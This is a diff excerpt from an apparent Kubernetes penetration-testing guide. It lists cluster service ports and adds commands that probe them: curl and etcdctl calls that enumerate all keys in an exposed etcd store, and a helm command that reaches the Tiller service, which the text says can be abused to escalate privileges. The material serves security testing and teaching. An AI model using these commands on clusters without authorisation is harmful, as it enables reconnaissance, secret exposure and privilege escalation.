| 9099/TCP | calico-felix | Health check server for Calico |
| 6782-4/TCP | weave | Metrics and endpoints |
| 30000-32767/TCP | NodePort | Proxy to the services |
| 44134/TCP | Tiller | Helm service listening |
### Kube-apiserver
@ -81,6 +82,18 @@ curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
```
### Tiller
```
helm --host tiller-deploy.kube-system:44134 version
```
You could abuse this service to escalate privileges inside Kubernetes:
{% content-ref url="../44134-pentesting-tiller-helm.md" %}
[44134-pentesting-tiller-helm.md](../44134-pentesting-tiller-helm.md)
{% endcontent-ref %}
### cAdvisor
Service useful to gather metrics.